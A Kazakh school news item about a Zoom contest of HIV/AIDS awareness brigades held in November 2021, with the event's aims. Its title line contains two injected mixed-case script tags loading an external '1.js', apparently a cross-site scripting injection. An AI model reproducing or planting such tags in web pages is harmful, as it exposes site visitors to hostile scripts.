18 қарашада Zoom платформасында үгіт-насихат бригадаларының онлайн байқауы өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
18.11.2021
18 қарашада Zoom платформасында үгіт-насихат бригадаларының онлайн байқауы өтті.
Іс-шараны №2 жалпы орта білім беретін мектеп ұйымдастырды. Іс-шарадан бір күн бұрын команда қатысушыларының жеребесі тартылды, әр команда қойылымның реттік нөмірін алдын-ала білді. ЖИТС бойынша үгіт-насихат бригадалар байқауы «Денсаулық – бақытты болашаққа бастар жол» ұранымен өтті.
Бүгінгі таңда елімізде АИТВ және ЖИТС-пен ауыратындар өте жоғары деңгейі байқалады. Оқушыларды осы аурудың салдарымен және берілу жолдарымен таныстыру маңызды.
Іс-шараның мақсаты:
- Білімді жалпылау және бекіту, білім алушыларда адамның иммун тапшылығы вирусының шығу тегі туралы, оның таралу әдістері, аурудың ағымы, қорғану жолдары туралы түсініктерді қалыптастыру; АИТВ жұқтыру мүмкіндігімен байланысты мінез-құлық тәуекелдерінің алдын алу бойынша белсенді өмірлік ұстанымды тұжырымдау; АИТВ- инфекциясының алдын алу мақсатында салауатты өмір салтын ұстану қажеттігі туралы сенімді қалыптастыру; АИТВ-ның нақты таралу ауқымы туралы түсінікті қалыптастыру.





Просмотров: 562